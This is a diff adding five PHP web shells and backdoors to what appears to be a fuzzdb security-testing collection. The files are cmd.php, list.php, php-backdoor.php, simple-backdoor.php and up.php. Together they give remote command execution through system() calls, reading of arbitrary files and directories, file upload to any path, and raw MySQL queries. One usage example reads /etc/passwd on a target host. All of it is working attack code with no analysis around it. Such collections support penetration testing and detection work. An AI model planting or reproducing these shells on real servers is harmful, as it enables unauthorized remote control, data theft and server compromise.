fzuudb-webshell

fuzzdb-webshell/php/cmd.php

@@ -0,0 +1,25 @@
+<?
+//
+// PHP_KIT
+//
+// cmd.php = Command Execution
+//
+// by: The Dark Raver
+// modified: 21/01/2004
+//
+?>
+<HTML><BODY>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<?
+if($_GET['cmd']) {
+  system($_GET['cmd']);
+  }
+?>
+</pre>
+</BODY></HTML>
+
+

fuzzdb-webshell/php/list.php

@@ -0,0 +1,33 @@
+<?
+//
+// PHP_KIT
+//
+// list.php = Directory & File Listing
+//
+// by: The Dark Raver
+// modified: 21/01/2004
+//
+?>
+
+<?
+
+if($_GET['file']) {
+	$fichero=$_GET['file']; 
+	} else {
+	$fichero="/";
+	} 
+
+if($handle = @opendir($fichero)) {
+  while($filename = readdir($handle)) {
+    echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
+    }
+  closedir($handle);
+  } else {
+  echo "FILE: " . $fichero . "<br><hr><pre>";
+  $fp = fopen($fichero, "r");
+  $buffer = fread($fp, filesize($fichero));
+  echo $buffer;
+  fclose($fp);
+  }
+
+?>

fuzzdb-webshell/php/php-backdoor.php

@@ -0,0 +1,71 @@
+<?
+// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
+
+ob_implicit_flush();
+if(isset($_REQUEST['f'])){
+        $filename=$_REQUEST['f'];
+        $file=fopen("$filename","rb");
+        fpassthru($file);
+        die;
+}
+if(isset($_REQUEST['d'])){
+        $d=$_REQUEST['d'];
+        echo "<pre>";
+        if ($handle = opendir("$d")) {
+        echo "<h2>listing of $d</h2>";
+                   while ($dir = readdir($handle)){ 
+                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
+							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
+                       echo "$dir\n"; 
+                       echo "</font></a>";
+                }
+                       
+        } else echo "opendir() failed";
+        closedir($handle);
+        die ("<hr>"); 
+}
+if(isset($_REQUEST['c'])){
+	echo "<pre>";
+	system($_REQUEST['c']);		   
+	die;
+}
+if(isset($_REQUEST['upload'])){
+
+		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
+			else $dir=$_REQUEST['dir'];
+		$fname=$HTTP_POST_FILES['file_name']['name'];
+		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
+			die('file uploading error.');
+}
+if(isset($_REQUEST['mquery'])){
+	
+	$host=$_REQUEST['host'];
+	$usr=$_REQUEST['usr'];
+	$passwd=$_REQUEST['passwd'];
+	$db=$_REQUEST['db'];
+	$mquery=$_REQUEST['mquery'];
+	mysql_connect("$host", "$usr", "$passwd") or
+    die("Could not connect: " . mysql_error());
+    mysql_select_db("$db");
+    $result = mysql_query("$mquery");
+	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
+    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
+    mysql_free_result($result);
+	die;
+}
+?>
+<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
+<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
+upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
+<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
+<br>for example:
+http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
+or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
+<hr>execute mysql query:
+<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
+host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
+
+database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
+</form>
+
+<!--	http://michaeldaw.org	2006 	-->

fuzzdb-webshell/php/simple-backdoor.php

@@ -0,0 +1,17 @@
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->

fuzzdb-webshell/php/up.php

@@ -0,0 +1,33 @@
+<?
+//
+// PHP_KIT
+//
+// up.php = File Upload
+//
+// by: The Dark Raver
+// modified: 21/01/2004
+//
+?>
+
+<html><body>
+
+<form enctype="multipart/form-data" action="" method="post">
+<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
+<p>Local File: <input name="userfile" type="file">
+<p>Remote File: <input name="remotefile" type="text">
+<input type="submit" value="Send">
+</form><br><br><br>
+
+<?
+
+if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
+   copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
+   echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
+} else {
+   echo "No File Uploaded";
+}
+
+?>
+
+</html></body>
+